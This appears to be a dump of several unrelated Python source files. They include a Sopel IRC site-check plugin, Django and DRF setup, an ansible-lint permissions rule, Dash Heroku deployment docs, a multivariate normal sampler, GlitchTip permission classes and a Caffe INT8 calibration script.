data0 = getattr(self, dataType)
if data0 == []: # data is new
# define the specific dictionary for the selected data type
attrList = attributes
else: # data already exists
attr0 = data0
# create a new/appended list of attributes
attr1 = attr0 + attributes
_isuniquelist(attr1, "attribute names in ")
attrList = attr1
# set a muted attribute with the settings for the selected data type
setattr(self, dataType, attrList)
def _proofTest(self):
"""Check that data was inputted"""
if self.dataFlags["macro"] and self.macro == []:
raise ValueError("macro data is expected to be provided.")
if self.dataFlags["micro"] and self.micro == []:
raise ValueError("micro data is expected to be provided.")
if self.dataFlags["kinetics"] and self.kinetics == []:
raise ValueError("kinetics data is expected to be provided.")
if self.dataFlags["meta"] and self.meta == []:
raise ValueError("meta data is expected to be provided.")
|
py | 1a3446d9a525f0eb30dd7362f75f1e4c76df76a6 | # -*- coding: utf-8 -*-
from sopel import web
from sopel.module import commands
import re
def is_http_url(s):
    if re.match(r'(?:www)?(?:[\w-]{2,255}(?:\.\w{2,6}){1,2})(?:/[\w&%?#-]{1,300})?', s):
return True
else:
return False
@commands('isup')
def isup(bot, trigger):
site = trigger.group(2)
if not site:
if bot.config.lang == 'fr':
return bot.reply("Quel website veux-tu que je verifie?")
elif bot.config.lang == 'es':
return bot.reply("Que web quieres que compruebe?")
else:
return bot.reply("What web do you want to check?")
if 'localhost' in site or '127.0.0.1' in site or '0::1' in site:
bot.reply("I'm minding on not say you it.")
return
    elif site[:7] != 'http://' and site[:8] != 'https://':
if '://' in site:
protocol = site.split('://')[0] + '://'
if bot.config.lang == 'fr':
return bot.reply("Tournez à tenter sans le %s" % protocol)
elif bot.config.lang == 'es':
return bot.reply("Vuelve a intentar sin el %s" % protocol)
else:
return bot.reply("Try it again without the %s" % protocol)
else:
if is_http_url(site) is False:
return bot.reply("That URL looks not valid for me.")
site = 'http://' + site
try:
response = web.get(site)
except Exception:
if bot.config.lang == 'fr':
bot.say('Sembla que ' + site + ' ne fonctionne pas ou n\'existe pas.')
elif bot.config.lang == 'es':
bot.say('Parece que ' + site + ' no funciona o no existe.')
else:
bot.say(site + ' looks down from here.')
return
if response:
if bot.config.lang == 'fr':
bot.say('Il n\'y a pas d\'aucun problème à ' + site)
elif bot.config.lang == 'es':
bot.say('No veo ningun problema en ' + site)
else:
bot.say(site + ' looks fine to me.')
else:
if bot.config.lang == 'fr':
bot.say('Semble que ' + site + ' ne fonctionne pas ou n\'existe pas.')
elif bot.config.lang == 'es':
bot.say('Parece que ' + site + ' no funciona o no existe.')
else:
bot.say(site + ' looks down from here.')
return
|
py | 1a3446fcda97c5de57f98d70fa66945754cb8844 | from django.contrib import admin
# Register your models here.
from .models import Lifter
from .models import License
from .models import District
from .models import Club
admin.site.register(Lifter)
admin.site.register(License)
admin.site.register(District)
admin.site.register(Club) |
py | 1a344732f7d5a73ee4be2e69863515bad04f5b22 | # Copyright (c) 2020 Sorin Sbarnea <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint.rules import AnsibleLintRule
class MissingFilePermissionsRule(AnsibleLintRule):
id = "208"
shortdesc = 'File permissions not mentioned'
description = (
"Missing mode parameter can cause unexpected file permissions based "
"on version of Ansible being used. Be explicit, or if you still "
"want the default behavior you can use ``mode: preserve`` to avoid "
"hitting this rule. See "
"https://github.com/ansible/ansible/issues/71200"
)
severity = 'VERY_HIGH'
tags = ['unpredictability']
version_added = 'v4.3.0'
_modules = (
'copy',
'file',
'ini_file',
'lineinfile',
'replace',
'template',
'unarchive',
)
def matchtask(self, file, task):
if task["action"]["__ansible_module__"] not in self._modules:
return False
if task['action'].get('state', None) == "absent":
return False
mode = task['action'].get('mode', None)
return mode is None
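    # Illustrative examples of the task dicts matchtask() receives (key names
    # other than "__ansible_module__", "state" and "mode" are assumptions):
    #   {"action": {"__ansible_module__": "copy"}}                       -> matches (no mode)
    #   {"action": {"__ansible_module__": "copy", "mode": "preserve"}}   -> no match
    #   {"action": {"__ansible_module__": "file", "state": "absent"}}    -> no match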
|
py | 1a3447ea133ce04c6977b72b8080f55ae3c4bc3e | import dash_core_components as dcc
import dash_html_components as html
from dash_docs import styles
from dash_docs import reusable_components as rc
layout = html.Div(children=[
rc.Markdown('''
# Deploying Dash Apps
By default, Dash apps run on `localhost` - you can only access them on your
own machine. To share a Dash app, you need to "deploy" it to a server.
    Our recommended method for securely deploying Dash applications is
[Dash Enterprise](https://plotly.com/dash).
> Dash Enterprise can be installed on the Kubernetes
> services of
> [AWS](https://go.plotly.com/dash-aws),
> [Azure](https://go.plotly.com/dash-azure),
> GCP,
> or an
> [on-premise Linux Server](https://plotly.com/dash/on-premises-linux/?utm_source=docs&utm_medium=workspace&utm_campaign=nov&utm_content=linux).
> [Find out if your company is using Dash Enterprise](https://go.plotly.com/company-lookup)
## Dash Enterprise Deployment
> If your company has licensed Dash Enterprise, then view the deployment
> documentation by visiting
>
> **`https://<your-dash-enterprise-platform>/Docs/dash-enterprise`**
>
> (Replace `<your-dash-enterprise-platform>` with the hostname of your
> licensed Dash Enterprise in your VPC).
>
> [Look up the hostname for your company's license](https://go.plotly.com/company-lookup)
[Dash Enterprise](https://plotly.com/dash/)
is Plotly's commercial product for developing & deploying
Dash Apps on your company's on-premises Linux servers or VPC
([AWS](https://plotly.com/dash/aws), [Google Cloud](https://plotly.com/dash), or [Azure](https://plotly.com/dash/azure)).
In addition to [easy, git-based deployment](https://plotly.com/dash/app-manager), the Dash Enterprise platform provides a complete Analytical App Stack.
This includes:
- [LDAP & SAML Authentication Middleware](https://plotly.com/dash/authentication)
- [Data Science Workspaces](https://plotly.com/dash/workspaces)
- [High Availability & Horizontal Scaling](https://plotly.com/dash/kubernetes)
- [Job Queue Support](https://plotly.com/dash/job-queue)
- [Enterprise-Wide Dash App Portal](https://plotly.com/dash/app-manager)
- [Design Kit](https://plotly.com/dash/design-kit)
- [Reporting, Alerting, Saved Views, and PDF Reports](https://plotly.com/dash/snapshot-engine)
- [Dashboard Toolkit](https://plotly.com/dash/toolkit)
- [Embedding Dash apps in Existing websites or Salesforce](https://plotly.com/dash/embedding)
- [AI App Catalog](https://plotly.com/dash/ai-and-ml-templates)
- [Big Data Best Practices](https://plotly.com/dash/big-data-for-python)
- [GPU support](https://plotly.com/dash/gpu-dask-acceleration)

## Heroku for Sharing Public Dash apps for Free
Heroku is one of the easiest platforms for deploying and managing public Flask
    applications. The git & buildpack-based deployment UIs of Heroku and Dash Enterprise
are nearly identical, enabling an easy transition to Dash Enterprise if you
are already using Heroku.
[View the official Heroku guide to Python](https://devcenter.heroku.com/articles/getting-started-with-python#introduction).
Here is a simple example. This example requires a Heroku account,
`git`, and `virtualenv`.
***
**Step 1. Create a new folder for your project:**
'''),
rc.Markdown('''
```shell
$ mkdir dash_app_example
$ cd dash_app_example
```
''', style=styles.code_container),
rc.Markdown('''
***
**Step 2. Initialize the folder with `git` and a `virtualenv`**
'''),
rc.Markdown('''
```shell
$ git init # initializes an empty git repo
$ virtualenv venv # creates a virtualenv called "venv"
$ source venv/bin/activate # uses the virtualenv
```
''',style=styles.code_container),
rc.Markdown('''
`virtualenv` creates a fresh Python instance. You will need to reinstall your
app's dependencies with this virtualenv:
'''),
rc.Markdown('''
```shell
$ pip install dash
$ pip install plotly
```
''', style=styles.code_container),
rc.Markdown('''
You will also need a new dependency, `gunicorn`, for deploying the app:
'''),
rc.Markdown('''
```shell
$ pip install gunicorn
```
''', style=styles.code_container),
rc.Markdown('''***
**Step 3. Initialize the folder with a sample app (`app.py`), a `.gitignore` file, `requirements.txt`, and a `Procfile` for deployment**
Create the following files in your project folder:
**`app.py`**
'''),
rc.Markdown('''
```python
import os
import dash
import dash_core_components as dcc
import dash_html_components as html
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
server = app.server
app.layout = html.Div([
html.H2('Hello World'),
dcc.Dropdown(
id='dropdown',
options=[{'label': i, 'value': i} for i in ['LA', 'NYC', 'MTL']],
value='LA'
),
html.Div(id='display-value')
])
@app.callback(dash.dependencies.Output('display-value', 'children'),
[dash.dependencies.Input('dropdown', 'value')])
def display_value(value):
return 'You have selected "{}"'.format(value)
if __name__ == '__main__':
app.run_server(debug=True)
```
''', style=styles.code_container),
rc.Markdown('''
***
**`.gitignore`**
'''),
rc.Markdown('''
```shell
venv
*.pyc
.DS_Store
.env
```
''', style=styles.code_container),
rc.Markdown('''
***
**`Procfile`**
'''),
rc.Markdown('''
```shell
web: gunicorn app:server
```
''', style=styles.code_container),
rc.Markdown('''
(Note that `app` refers to the filename `app.py`.
`server` refers to the variable `server` inside that file).
***
**`requirements.txt`**
`requirements.txt` describes your Python dependencies.
You can fill this file in automatically with:
'''),
rc.Markdown('''
```shell
$ pip freeze > requirements.txt
```
''', style=styles.code_container),
rc.Markdown('''
***
**4. Initialize Heroku, add files to Git, and deploy**
'''),
rc.Markdown('''
```shell
$ heroku create my-dash-app # change my-dash-app to a unique name
$ git add . # add all files to git
$ git commit -m 'Initial app boilerplate'
$ git push heroku master # deploy code to heroku
$ heroku ps:scale web=1 # run the app with a 1 heroku "dyno"
```
''', style=styles.code_container),
rc.Markdown('''
You should be able to view your app at `https://my-dash-app.herokuapp.com`
(changing `my-dash-app` to the name of your app).
**5. Update the code and redeploy**
When you modify `app.py` with your own code, you will need to add the changes
to git and push those changes to heroku.
'''),
rc.Markdown('''
```shell
$ git status # view the changes
$ git add . # add all the changes
$ git commit -m 'a description of the changes'
$ git push heroku master
```
''', style=styles.code_container),
rc.Markdown('''
***
This workflow for deploying apps on Heroku is very similar to how deployment
    works with Plotly's Dash Enterprise.
[Learn more](https://plotly.com/dash/) or [get in touch](https://plotly.com/get-demo/).
''')
])
|
py | 1a3448a72870f9a11cb01bfef38f28b2d7bfa974 | from .views import ContentViewSet
from django.conf.urls import url, include
from rest_framework import routers
router = routers.DefaultRouter()
router.register(r'contents', ContentViewSet)
urlpatterns = [
url(r'^', include(router.urls)),
]
|
py | 1a3448b1474cff1fcc2b864897c55133bfcd1220 | #!/usr/bin/env python
import logging
import warnings
import numpy as np
from numpy.lib.ufunclike import isposinf
from scipy.stats import chi
EPS = 1e-8
class MultiVariateNormalDistribution(object):
def __init__(self, shift, scale, cov, dim=None):
# main components
self.shift = shift
self.scale = scale
self.cov = cov
# params
self.dim = dim if dim is not None else shift.shape[0]
# states
self.eigvecs = None
self.eigvals = None
self.inv_cov = None
self.invsqrt_cov = None
self.rev = None
# decompose cov
self.decomposed = False
def decompose(self, force_positive=False, shrinkage=0, rescale=None, bound_size=float('inf')):
# force symmetric
self.cov = (self.cov + self.cov.T) / 2.0
# solve
self.eigvals, self.eigvecs = np.linalg.eigh(self.cov)
# force positive definite
if force_positive:
self.eigvals = np.clip(self.eigvals, EPS, None)
# shrinkage
if shrinkage > 0:
trace_cov = np.sum(self.eigvals)
self.eigvals = (1 - shrinkage) * self.eigvals + shrinkage * (trace_cov / self.dim) * np.ones(self.dim)
# rescale
if rescale is not None:
ratio = (self.scale / rescale) ** 2
self.cov *= ratio
self.eigvals *= ratio
self.scale = rescale
# restrict max length
base_length = chi.mean(self.dim) + 2.0 * chi.std(self.dim)
max_eigval = (bound_size / base_length) ** 2
self.eigvals = np.clip(self.eigvals, EPS, max_eigval)
# computing
with warnings.catch_warnings(record=True) as w:
self.cov = np.dot(self.eigvecs, np.diag(self.eigvals)).dot(self.eigvecs.T)
#inv cov
self.inv_cov = np.dot(self.eigvecs, np.diag(self.eigvals ** -1)).dot(self.eigvecs.T)
# inv sqrt cov
self.invsqrt_cov = np.dot(self.eigvecs, np.diag(self.eigvals ** -0.5)).dot(self.eigvecs.T)
# sqrt cov
self.sqrt_cov = np.dot(self.eigvecs, np.diag(self.eigvals ** 0.5)).dot(self.eigvecs.T)
# reverse projection matrix
self.rev = np.dot(np.diag(self.eigvals ** -0.5), self.eigvecs.T)
# handle warnings
if len(w) > 0:
print("Eigvals: ", self.eigvals)
print("Sigma: ", self.scale)
raise Exception("Negative eigval")
def sample(self, num, remap=None):
if not self.decomposed:
self.decompose()
bias = np.random.normal(size=[num, self.dim])
amp_bias = self.scale * (self.eigvals ** 0.5)[np.newaxis,:] * bias
rot_bias = np.dot(amp_bias, self.eigvecs.T)
samples = self.shift[np.newaxis,:] + rot_bias
if remap is not None:
samples = remap(samples)
return samples
def dispersion(self, X):
x = X.reshape(-1, self.dim)
y = x - self.shift[np.newaxis, :]
z = np.dot(y / self.scale, self.invsqrt_cov)
dens = np.sum(z ** 2, axis=1)
if len(X.shape) == 1:
dens = dens[0]
return dens
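# Minimal usage sketch (dimensions and values are illustrative): build an
# isotropic 3-D search distribution, draw a few samples, then measure how far
# they lie from the mean under the same covariance model.
#
#   mvnd = MultiVariateNormalDistribution(shift=np.zeros(3), scale=1.0,
#                                         cov=np.eye(3))
#   samples = mvnd.sample(5)          # triggers decompose() on first use
#   print(mvnd.dispersion(samples))   # per-sample squared Mahalanobis-like distance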
|
py | 1a344902adc50bbe172d020be4f9a2271913c41c | from .network import KubeModel
from .dataset import KubeDataset
|
py | 1a34494ba6550fd9099bba9bf7e02caef724717b | from glitchtip.permissions import ScopedPermission
class ProjectPermission(ScopedPermission):
scope_map = {
"GET": ["project:read", "project:write", "project:admin"],
"POST": ["project:write", "project:admin"],
"PUT": ["project:write", "project:admin"],
"DELETE": ["project:admin"],
}
def get_user_scopes(self, obj, user):
return obj.organization.get_user_scopes(user)
class ProjectKeyPermission(ProjectPermission):
def get_user_scopes(self, obj, user):
return obj.project.organization.get_user_scopes(user)
|
py | 1a344a985b0cf9324fda9ffd3f5f573f07100fed | # -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# DeepGlint is pleased to support the open source community by making EasyQuant available.
# Copyright (C) 2020 DeepGlint. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Modified from https://github.com/BUG1989/caffe-int8-convert-tools
# BUG1989 is pleased to support the open source community by supporting ncnn available.
#
# Copyright (C) 2019 BUG1989. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
"""
Quantization module for generating the calibration tables will be used by
quantized (INT8) models from FP32 models.with bucket split,[k, k, cin, cout]
cut into "cout" buckets.
This tool is based on Caffe Framework.
"""
from __future__ import division
from __future__ import print_function
import argparse
import numpy as np
import math, copy
import matplotlib.pyplot as plt
import sys,os
import caffe
import caffe.proto.caffe_pb2 as caffe_pb2
import time
import datetime
from google.protobuf import text_format
from scipy import stats
import cv2
# np.set_printoptions(threshold='nan')
np.set_printoptions(suppress=True)
def parse_args():
parser = argparse.ArgumentParser(
description='find the pretrained caffe models int8 quantize scale value')
parser.add_argument('--proto', dest='proto',
help="path to deploy prototxt.", type=str)
parser.add_argument('--model', dest='model',
help='path to pretrained weights', type=str)
parser.add_argument('--mean', dest='mean',
help='value of mean', type=float, nargs=3)
parser.add_argument('--norm', dest='norm',
help='value of normalize', type=float, nargs=1, default=1.0)
parser.add_argument('--images', dest='images',
help='path to calibration images', type=str)
parser.add_argument('--output', dest='output',
help='path to output calibration table file', type=str, default='calibration-dev.table')
parser.add_argument('--group', dest='group',
help='enable the group scale', type=int, default=1)
parser.add_argument('--gpu', dest='gpu',
help='use gpu to forward', type=int, default=0)
parser.add_argument('--threshold', dest='threshold',
help='the threshold of activations', type=float, default=float('inf'))
parser.add_argument('--histgram', dest='histgram',
help='whether to generate activation histograms', type=bool, default=False)
parser.add_argument('--cv2', dest='cv2',help='whether use opencv read image', type=bool, default=False)
args = parser.parse_args()
return args, parser
global args, parser
args, parser = parse_args()
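# Example invocation (file paths, mean and norm values below are illustrative only):
#   python caffe-int8-scale-tools-dev.py --proto deploy.prototxt --model net.caffemodel \
#       --mean 103.94 116.78 123.68 --norm 0.017 --images ./calibration_images \
#       --output calibration-dev.table --gpu 1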
# global params
QUANTIZE_NUM = 127  # max magnitude of a signed 8-bit value
QUANTIZE_WINOGRAND_NUM = 127  # bound used when the winograd flag is set (same 8-bit value here)
STATISTIC = 1
INTERVAL_NUM = 2001
# ugly global params
quantize_layer_lists = []
def image_processing(image, image_size, mean_value):
w = image.shape[1]
h = image.shape[0]
m = min(w, h)
ratio = 256.0 / m
new_w, new_h = int(ratio * w), int(ratio * h)
image = cv2.resize(image, (new_w, new_h))
image = image.astype(np.float32)
top = (new_w - image_size)//2
left = (new_h - image_size)//2
image = image[left:left+image_size, top:top+image_size]
image = image - mean_value
image = image.transpose(2, 0, 1)
return image # bgr, chw, normalized
class QuantizeLayer:
def __init__(self, name, blob_name, group_num):
self.name = name
self.blob_name = blob_name
self.group_num = group_num
self.weight_scale = np.zeros(group_num)
self.blob_max = 0.0
self.blob_distubution_interval = 0.0
self.blob_distubution = np.zeros(INTERVAL_NUM)
self.blob_distubution_edges= np.zeros(INTERVAL_NUM)
self.blob_threshold = 0
self.blob_scale = 1.0
self.group_zero = np.zeros(group_num)
self.pc= True
def quantize_weight(self, weight_data, flag):
        # split the weight data by cout num
blob_group_data = np.array_split(weight_data, self.group_num)
#add by diwu
glob_group_max= np.max(weight_data)
glob_group_min= np.min(weight_data)
glob_group_threshold = max(abs(glob_group_max), abs(glob_group_min))
for i, group_data in enumerate(blob_group_data):
#per channel quant
if self.pc:
max_val = np.max(group_data)
min_val = np.min(group_data)
threshold = max(abs(max_val), abs(min_val))
if threshold < 0.0001:
self.weight_scale[i] = 0
self.group_zero[i] = 1
else:
if(flag == True):
self.weight_scale[i] = QUANTIZE_WINOGRAND_NUM / threshold
else:
self.weight_scale[i] = QUANTIZE_NUM / threshold
print("%-20s group : %-5d max_val : %-10f scale_val : %-10f" % (self.name + "_param0", i, threshold, self.weight_scale[i]))
else:
if glob_group_threshold < 0.0001:
self.weight_scale[i] = 0
self.group_zero[i] = 1
else:
if(flag == True):
self.weight_scale[i] = QUANTIZE_WINOGRAND_NUM / glob_group_threshold
else:
self.weight_scale[i] = QUANTIZE_NUM / glob_group_threshold
print("%-20s group : %-5d max_val : %-10f scale_val : %-10f" % (self.name + "_param0", i, glob_group_threshold, self.weight_scale[i]))
def initial_blob_max(self, blob_data):
# get the max value of blob
max_val = np.max(blob_data)
min_val = np.min(blob_data)
self.blob_max = max(self.blob_max, max(abs(max_val), abs(min_val)))
        # Avoid unusually large activations by clipping blob_max with the user-supplied threshold
self.th= min(self.blob_max, args.threshold)
def initial_blob_distubution_interval(self):
self.blob_distubution_interval = STATISTIC * self.th / INTERVAL_NUM
print("%-20s max_val : %-10.8f distribution_intervals : %-10.8f" % (self.name, self.blob_max, self.blob_distubution_interval))
def initial_histograms(self, blob_data):
# collect histogram of every group channel blob
th= self.th
        # Truncate the histogram range at the clipped max so that values
        # beyond the boundary do not fall into the statistics.
        # add by diwu
hist, hist_edge = np.histogram(blob_data, bins=INTERVAL_NUM, range=(0, th))
self.blob_distubution_edges = hist_edge
self.blob_distubution += hist
def quantize_blob(self):
# calculate threshold
distribution = np.array(self.blob_distubution)
# pick threshold which minimizes KL divergence
threshold_bin = threshold_distribution(distribution)
self.blob_threshold = threshold_bin
threshold = (threshold_bin + 0.5) * self.blob_distubution_interval
# get the activation calibration value
self.blob_scale = QUANTIZE_NUM / threshold
#self.blob_scale = np.max(self.blob_scale,1) #add by diwu
print("%-20s bin : %-8d threshold : %-10f interval : %-10f scale : %-10f" % (self.name, threshold_bin, threshold, self.blob_distubution_interval, self.blob_scale))
def _smooth_distribution(p, eps=0.0001):
"""Given a discrete distribution (may have not been normalized to 1),
smooth it by replacing zeros with eps multiplied by a scaling factor and taking the
corresponding amount off the non-zero values.
Ref: http://web.engr.illinois.edu/~hanj/cs412/bk3/KL-divergence.pdf
"""
is_zeros = (p == 0).astype(np.float32)
is_nonzeros = (p != 0).astype(np.float32)
n_zeros = is_zeros.sum()
n_nonzeros = p.size - n_zeros
if not n_nonzeros:
raise ValueError('The discrete probability distribution is malformed. All entries are 0.')
eps1 = eps * float(n_zeros) / float(n_nonzeros)
assert eps1 < 1.0, 'n_zeros=%d, n_nonzeros=%d, eps1=%f' % (n_zeros, n_nonzeros, eps1)
hist = p.astype(np.float32)
hist += eps * is_zeros + (-eps1) * is_nonzeros
assert (hist <= 0).sum() == 0
return hist
def threshold_distribution(distribution, target_bin=128):
"""
Return the best threshold value.
Ref: https://github.com//apache/incubator-mxnet/blob/master/python/mxnet/contrib/quantization.py
Args:
distribution: list, activations has been processed by histogram and normalize,size is 2048
target_bin: int, the num of bin that is used by quantize, Int8 default value is 128
Returns:
target_threshold: int, num of bin with the minimum KL
"""
distribution = distribution[1:]
length = distribution.size
threshold_sum = sum(distribution[target_bin:])
kl_divergence = np.zeros(length - target_bin)
for threshold in range(target_bin, length):
sliced_nd_hist = copy.deepcopy(distribution[:threshold])
# generate reference distribution p
p = sliced_nd_hist.copy()
p[threshold-1] += threshold_sum
threshold_sum = threshold_sum - distribution[threshold]
# is_nonzeros[k] indicates whether hist[k] is nonzero
is_nonzeros = (p != 0).astype(np.int64)
#
quantized_bins = np.zeros(target_bin, dtype=np.int64)
# calculate how many bins should be merged to generate quantized distribution q
num_merged_bins = sliced_nd_hist.size // target_bin
# merge hist into num_quantized_bins bins
for j in range(target_bin):
start = j * num_merged_bins
stop = start + num_merged_bins
quantized_bins[j] = sliced_nd_hist[start:stop].sum()
quantized_bins[-1] += sliced_nd_hist[target_bin * num_merged_bins:].sum()
# expand quantized_bins into p.size bins
q = np.zeros(sliced_nd_hist.size, dtype=np.float64)
for j in range(target_bin):
start = j * num_merged_bins
if j == target_bin - 1:
stop = -1
else:
stop = start + num_merged_bins
norm = is_nonzeros[start:stop].sum()
if norm != 0:
q[start:stop] = float(quantized_bins[j]) / float(norm)
q[p == 0] = 0
p = _smooth_distribution(p) # with some bugs, need to fix
q = _smooth_distribution(q)
p[p == 0] = 0.0001
q[q == 0] = 0.0001
# calculate kl_divergence between q and p
kl_divergence[threshold - target_bin] = stats.entropy(p, q)
min_kl_divergence = np.argmin(kl_divergence)
threshold_value = min_kl_divergence + target_bin
return threshold_value
def net_forward(net, image_path, transformer=None, image_size=224, mean_value=[103.939, 116.779, 123.68]):
"""
    run network inference on a single image (preprocessing + forward pass)
Args:
net: the instance of Caffe inference
image_path: a image need to be inference
transformer: caffe io transformar
image_size: image shape of blob data
mean_value: mean value for normalization
Returns:
none
"""
if args.cv2:
# load image
image = cv2.imread(image_path)
image = image_processing(image, image_size, mean_value)
net.blobs['data'].reshape(1, 3, image_size, image_size)
net.blobs['data'].data[...] = np.array([image], dtype=np.float32)
else:
# load image
im = caffe.io.load_image(image_path)
nh, nw = 224, 224
h, w, _ = im.shape
if h < w:
off = int((w - h) / 2)
im = im[:, off:off + h]
else:
off = int((h - w) / 2)
im = im[off:off + h, :]
im = caffe.io.resize_image(im, [nh, nw])
# transformer.preprocess the image
net.blobs['data'].data[...] = transformer.preprocess('data', im)
# net forward
output = net.forward()
def file_name(file_dir):
"""
    Find all file paths under the given directory
Args:
file_dir: The source file directory
Returns:
files_path: all the file path into a list
"""
files_path = []
for root, dir, files in os.walk(file_dir):
for name in files:
file_path = root + "/" + name
print(file_path)
files_path.append(file_path)
return files_path
def network_prepare(net, mean, norm):
"""
instance the prepare process param of caffe network inference
Args:
net: the instance of Caffe inference
mean: the value of mean
norm: the value of normalize
Returns:
none
"""
print("Network initial")
img_mean = np.array(mean, dtype=np.float32)
# initial transformer
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
# convert hwc to cwh
transformer.set_transpose('data', (2,0,1))
# convert RGB -> BGR
transformer.set_channel_swap('data', (2,1,0))
# resize image data from [0,1] to [0,255]
transformer.set_raw_scale('data', 255)
# load meanfile
transformer.set_mean('data', img_mean)
# normalize
transformer.set_input_scale('data', norm)
return transformer
def weight_quantize(net, net_file, group_on, winograd=False):
"""
CaffeModel convolution weight blob Int8 quantize
Args:
net: the instance of Caffe inference
net_file: deploy caffe prototxt
Returns:
none
"""
print("\nQuantize the kernel weight:")
# parse the net param from deploy prototxt
params = caffe_pb2.NetParameter()
with open(net_file) as f:
text_format.Merge(f.read(), params)
for i, layer in enumerate(params.layer):
# find the convolution layers to get out the weight_scale
if(layer.type == "Convolution" or layer.type == "ConvolutionDepthwise"):
weight_blob = net.params[layer.name][0].data
            # initialize the QuantizeLayer instance; with group quantize enabled, an int8 scale is generated for each output channel (num_output groups)
if (group_on == 1):
quanitze_layer = QuantizeLayer(layer.name, layer.bottom[0], layer.convolution_param.num_output)
else:
quanitze_layer = QuantizeLayer(layer.name, layer.bottom[0], 1)
if not winograd:
# quantize the weight value using QUANTIZE_WINOGRAND_NUM for all layers
quanitze_layer.quantize_weight(weight_blob, True)
else:
# quantize the weight value using 6bit for conv3x3s1 layer to winograd F(4,3)
if(layer.type == "Convolution" and layer.convolution_param.kernel_size[0] == 3 and ((len(layer.convolution_param.stride) == 0) or layer.convolution_param.stride[0] == 1)):
if(layer.convolution_param.group != layer.convolution_param.num_output):
quanitze_layer.quantize_weight(weight_blob, True)
else:
quanitze_layer.quantize_weight(weight_blob, False)
# quantize the weight value using 8bit for another conv layers
else:
quanitze_layer.quantize_weight(weight_blob, False)
# add the quantize_layer into the save list
quantize_layer_lists.append(quanitze_layer)
return None
def activation_quantize(net, transformer, images_files):
"""
    Activation Int8 quantize: optimize threshold selection with KL divergence;
given a dataset, find the optimal threshold for quantizing it.
Ref: http://on-demand.gputechconf.com/gtc/2017/presentation/s7310-8-bit-inference-with-tensorrt.pdf
Args:
net: the instance of Caffe inference
transformer:
images_files: calibration dataset
Returns:
none
"""
print("\nQuantize the Activation:")
# run float32 inference on calibration dataset to find the activations range
for i , image in enumerate(images_files):
# inference
net_forward(net, image, transformer)
# find max threshold
for layer in quantize_layer_lists:
blob = net.blobs[layer.blob_name].data[0].flatten()
layer.initial_blob_max(blob)
if i % 100 == 0:
print("loop stage 1 : %d/%d" % (i, len(images_files)))
# calculate statistic blob scope and interval distribution
for layer in quantize_layer_lists:
layer.initial_blob_distubution_interval()
# for each layers
# collect histograms of activations
print("\nCollect histograms of activations:")
for i, image in enumerate(images_files):
net_forward(net, image, transformer)
for layer in quantize_layer_lists:
blob = net.blobs[layer.blob_name].data[0].flatten()
blob= blob[blob > 0]
layer.initial_histograms(blob)
if i % 100 == 0:
print("loop stage 2 : %d/%d" % (i, len(images_files)))
# calculate threshold with KL divergence
if args.histgram:
from collections import OrderedDict
quant_hist= OrderedDict()
for layer in quantize_layer_lists:
layer.quantize_blob()
if args.histgram:
quant_hist[layer.name]= (layer.blob_max,layer.blob_distubution,layer.blob_distubution_edges,QUANTIZE_NUM/layer.blob_scale)
if args.histgram:
import pickle
with open('histgram.pkl','wb') as f:
pickle.dump(quant_hist,f)
print('save histograms success! use plot script to generate graphs')
return None
def save_calibration_file(calibration_path):
calibration_file = open(calibration_path, 'w')
# save temp
save_temp = []
# save weight scale
for layer in quantize_layer_lists:
save_string = layer.name + "_param_0"
for i in range(layer.group_num):
save_string = save_string + " " + str(layer.weight_scale[i])
save_temp.append(save_string)
# save bottom blob scales
for layer in quantize_layer_lists:
save_string = layer.name + " " + str(layer.blob_scale)
save_temp.append(save_string)
